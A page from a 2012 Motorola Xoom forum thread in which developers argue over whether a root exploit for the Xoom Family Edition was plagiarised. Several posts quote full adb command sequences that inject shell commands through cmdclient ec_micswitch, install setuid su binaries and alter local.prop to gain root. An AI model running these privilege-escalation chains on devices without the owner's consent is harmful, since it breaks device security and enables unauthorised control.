• Login:

Welcome to the Xoom Forum - Motorola Xoom Forum.

Register ButtonIf this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed.

Attention xoom fe users!!!!!!!!!!!!!!!!!!!!

This is a discussion on Attention xoom fe users!!!!!!!!!!!!!!!!!!!! within the Evil_DevNull forums, part of the Motorola Xoom Family Edition Development category; So wait, you said youre rooted on build 06 but you dont know what whitelisting is? Superuser asking to allow or deny root access. How ...

Page 2 of 4 FirstFirst 1 2 3 4 LastLast
Like Tree2Likes

Thread: Attention xoom fe users!!!!!!!!!!!!!!!!!!!!

Developer

Member #
    Liked
    71 times
    Twitter
    Evil_DevNull
    So wait, you said youre rooted on build 06 but you dont know what whitelisting is? Superuser asking to allow or deny root access. How did you acquire root? With my method or dans?

Sent from my Evil Evo 3D cuz i TOLD IT TOO!

Support a Forum and a Developer which is here to support YOU.

~ If you like my work please consider buying me a Monster Energy HERE. Your support is greatly appreciated. Thank you! ~

2. # ADS
    Ads

Xoom Operative
    Member #
    Liked
    13 times
    I must ask,
    please take no offense.
    can you prove that you published a exploit before the date on this thread at xda:
    [ROOTED] Rooting An Acer Iconia A100 - xda-developers
    the date is 8/11/11
    you have been called out by Dan, can you prove your work before this thread?
    I hope you can, remember I sent you some change to help you get started with it.(I do not even have a fe)

Developer

Member #
    Liked
    71 times
    Twitter
    Evil_DevNull
    lets go over Dan's call out on this and review the coding and i'll ever bold the differences

The Acer coding

0. put your favorite su binary in /mnt/sdcard/su
    1. adb shell /system/bin/cmdclient ec_micswitch '`mount -o remount,rw /system`'
    2. adb shell /system/bin/cmdclient ec_micswitch '`cat /mnt/sdcard/su >/system/xbin/su`'
    3. adb shell /system/bin/cmdclient ec_micswitch '`chmod 6755 /system/xbin/su`'

Now look at stage one of the Raider code which is HOW IT NEEDS TO BE to create a hole on the Family Edition

MY CODE
    ----------------------------------------------------------------------------------------------------------------
    adb shell /system/bin/cmdclient ec_micswitch '`mount -o remount,rw /system`'
    adb shell /system/bin/cmdclient ec_micswitch '`dd if=/system/bin/ash of=/system/xbin/su`'
    adb shell /system/bin/cmdclient ec_micswitch '`chmod 6755 /system/xbin/su`'
    adb reboot
    pause
    adb shell /system/bin/cmdclient ec_micswitch '`mount -o remount,rw /system`'
    adb shell /system/bin/cmdclient ec_micswitch '`dd if=/system/bin/ash of=/system/sbin/su`'
    adb shell /system/bin/cmdclient ec_micswitch '`chmod 6755 /system/sbin/su`'
    ---------------------------------------------------------------------------------------------------------------
    Take into account that commands to remount and mount the system folders are the same, as for getting the system to ask for permissions on the FE you needed to do the following stage 2 found here The Motorola Xoom Family Edition Rooting Exploit

There is a large differance in the 2 exploits the acer one, once done, you can just download superuser from the market and go at it, with the FE, definatly NOT the case

As for proving it was done before August, we i can not prove that since i didn't have the xoom before Nov 27th 2011 and couldn't have since the Family Edition was released Oct 17th 2011. So what would you like me to do to prove YET again that this is NOT a kang?

Now lets look at Dans coding and how it can't work correctly. oh and while i explain this, keep in mind the the local.prop exicution is only for the phones and not relivant on the FE as shown here http://www.talkandroid.com/92304-attention-motorola-users-you-now-have-root/#.T0CPBlJZ6-l

oh and let me remind you of this little stunt he tried to pull http://www.androidpolice.com/2012/02...nty-is-raised/

-------------------------------DANS CODING----------------------------------------------

adb shell "/system/bin/cmdclient sys_open"
    adb shell "rm /data/local.prop 2>/dev/null"
    adb shell "echo 'ro.kernel.qemu=1' > /data/local.prop"

echo [*] Rebooting device...
    adb reboot
    echo [*] Press any key once the reboot has completed.
    pause
    adb wait-for-device

echo [*] Attemping persistence...
    adb remount
    adb push su /system/bin/su
    adb shell "chmod 6755 /system/bin/su"
    adb shell "ln -s /system/bin/su /system/xbin/su"
    adb push busybox /system/xbin/busybox
    adb shell "chmod 755 /system/xbin/busybox"
    adb shell "/system/xbin/busybox --install /system/xbin"
    adb push Superuser.apk /system/app/Superuser.apk

echo [*] Cleaning up...
    adb shell "rm /data/local.prop"
    adb shell "chmod 771 /data/"
    adb shell "chmod 770 /cache/"
    adb shell "chmod 775 /tmp/"
    --------------------------------------------------------------------------------------------------------------------

Looks to me as thou my stuff was the stuff kanged, who plagiarized who again?
    Last edited by Evil_DevNull; 02-19-2012 at 09:37 PM.
    trter10 likes this.

~ If you like my work please consider buying me a Monster Energy HERE. Your support is greatly appreciated. Thank you! ~

Xoom Informant
    Member #
    Liked
    1 times
    Quote Originally Posted by Evil_DevNull View Post
    So wait, you said youre rooted on build 06 but you dont know what whitelisting is? Superuser asking to allow or deny root access. How did you acquire root? With my method or dans?

Sent from my Evil Evo 3D cuz i TOLD IT TOO!
    Yes, superuser asks to have permission for apps to run, I have been in the rooting game since June of last year, never heard of it like that, never looked for qhat it was called either, I used Dan's method

Sent from my Mecha in a Thundershed

Developer

Member #
    Liked
    71 times
    Twitter
    Evil_DevNull
    Quote Originally Posted by nick.tbolt View Post
    Yes, superuser asks to have permission for apps to run, I have been in the rooting game since June of last year, never heard of it like that, never looked for qhat it was called either, I used Dan's method

did you compare? funny thing is i have to call BS on it because even Dan Rosenberg says "reports are coming in that the this exploit is NOT working on the Xoom Family Edition."

Attention Motorola Users: You Now Have Root! | TalkAndroid.com

Explain that to me? did you run my raider at anytime?

Xoom Lurker
    Member #
    Liked
    0 times
    i dont code but i can see that 1 dans looks like crap . 2 evils mounting and remounting and changing permissions before the reboot and dans is after .3 wtf is adb shell "/system/bin/cmdclient sys_open" im no coder but i can see its not anywhere in evils code.. so if i dont code and all how can anyone call that a kang ?

Xoom Informant
    Member #
    Liked
    1 times
    Quote Originally Posted by Evil_DevNull View Post
    did you compare? funny thing is i have to call BS on it because even Dan Rosenberg says "reports are coming in that the this exploit is NOT working on the Xoom Family Edition."

Attention Motorola Users: You Now Have Root! | TalkAndroid.com

Explain that to me? did you run my raider at anytime?
    No, I never ran your raider, I was on 06, I downloaded Dan's root method from his website, and it worked

Xoom Operative
    Member #
    Liked
    13 times
    someone used cat and someone used dd, both with the same results.
    but as a linux user dd is a better way to go, and the difference of a file being called ash or su is rather trivial wouldn't you say?
    I fail to see how dan stole any code he pointed to the source of the originally code, miner tweaks to accommodate a device do not make it brand new code, I would think.
    so what date did you receive the first device you unlock? maybe it is before that August date.

Developer

Member #
    Liked
    71 times
    Twitter
    Evil_DevNull
    Nick.tbolt, take an pic of superuser asking permission. Load up a root app. Show me. And as for liftman.

You dont have an FE? Hmm cuz nither does Dan.

Ash is a system file you would su to get global root.

Xoom Informant
    Member #
    Liked
    1 times
    Attached Images Attached Images

Page 2 of 4 FirstFirst 1 2 3 4 LastLast

Remove Ads

Ads